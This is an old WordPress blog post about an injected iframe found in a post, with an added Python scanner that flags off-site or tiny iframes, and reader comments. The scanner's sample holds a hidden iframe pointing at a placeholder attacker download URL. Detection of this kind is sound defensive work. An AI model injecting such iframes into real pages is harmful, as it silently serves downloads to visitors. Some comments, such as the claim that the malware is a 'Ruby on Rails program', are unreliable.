First time I’ve visited my blog in a while, and I’ve discovered a problem with my site’s security. If you view this post you can see that there is a strange vertical black line at the bottom of the post.

Editing the post shows that it is actually an iframe.

I’m not sure if this is a problem with the security of my server, or a WordPress problem. My feeling is that it might be a WordPress security problem as nothing more sinister has shown itself yet.
I’m going to leave it there for now so that SEOidiot can have a look (I know he loves this kind of stuff). You might think I’ve gone daft publicly exposing a security flaw on my server… I can tell you I’m not daft enough to have my personal blog on a server with anything that matters too much, and I have backups.
If you have seen this before please leave a comment. I’m just hoping now that it isn’t some kind of secret project that I have forgotten about…
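For anyone who wants to check their own posts for the same thing, here is an added example (not part of the original post, and not WordPress code) that scans a post body for iframes pointing off-site or sized so small that they render as little more than a thin line; the hostnames in it are made-up placeholders.

```python
import html.parser
from urllib.parse import urlparse

# Constructed sample post body: ordinary markup plus an injected iframe.
# "attacker.example" and "myblog.example" are placeholder hostnames.
SAMPLE_POST = """<p>Some post text.</p>
<p>More text.</p>
<iframe src="http://attacker.example/dl" width="2" height="300" frameborder="0"></iframe>
"""

class IframeCollector(html.parser.HTMLParser):
    """Collect the attributes of every <iframe> start tag in the markup."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))

def _dimension(value):
    """Parse a width/height attribute such as "2", "300px" or "100%"."""
    if value is None:
        return None
    try:
        return int(str(value).strip().rstrip("px%"))
    except ValueError:
        return None

def find_suspicious_iframes(post_html, site_host, max_small=10):
    """Return iframes whose src is off-site or whose frame is too small to notice."""
    parser = IframeCollector()
    parser.feed(post_html)
    flagged = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        host = urlparse(src).hostname or ""
        reasons = []
        if host and host != site_host:
            reasons.append("off-site src " + host)
        w, h = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
        if (w is not None and w <= max_small) or (h is not None and h <= max_small):
            reasons.append("tiny frame %sx%s" % (w, h))
        if reasons:
            flagged.append({"src": src, "reasons": reasons})
    return flagged

if __name__ == "__main__":
    for hit in find_suspicious_iframes(SAMPLE_POST, "myblog.example"):
        print(hit)
```

Run it over each row of the posts table (or the exported XML) with your own hostname; anything it flags deserves a look in the post editor.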

July 16th, 2007 at 12:49 pm
Um, your site password is currently exposed in your RSS feed.
September 2nd, 2007 at 10:33 pm
For some reason it’s an open FTP hole…
Apparently some net hack decided to put an automatic download into your site, so that anyone reading your blog would auto-magically receive whatever file was being hosted at that free IP redirect server…
My guess is that the hack was actually automated… Hack bots are now very common… they also rely heavily on remote zombie bots, which get created when unsuspecting visitors to hacked sites unwittingly download the programs hidden in this type of hack… generally a Ruby on Rails program (which Microsoft has no intention of warning you about because that’s how they get their useless software into your computer as well) which grants the hacker or crew access to your box remotely…
Crews generally employ thousands of zombie boxes to scan and hack sites to put this type of hack in… to recruit thousands more zombie bots.
Mostly useless until they decide they need to send a DDoS attack at some poor website or user online…
With a single command they can send hundreds of thousands of HTTP GET and PUT requests at a single server, completely knocking something as big as FBI.GOV offline…
-Paul
Victim of this type of attack before
September 20th, 2007 at 9:01 pm
I have heard that some files in wp-admin have security leaks. So on my blog I have moved these files to a safer location (/root/blog/):
import.php
inline-uploading.php
install.php
link-import.php
plugin-editor.php
templates.php
theme-editor.php
upgrade.php
If you don’t need to edit themes or plugins from your blog then remove them.
They are exploited already.
Hope that helps you.
Roland
September 22nd, 2007 at 7:32 am
It’s a bug, pilkster!
The same ways when you’re accessing their plugins/themes by calling the address directly.
November 4th, 2007 at 4:55 pm
Yeah… pretty neat huh?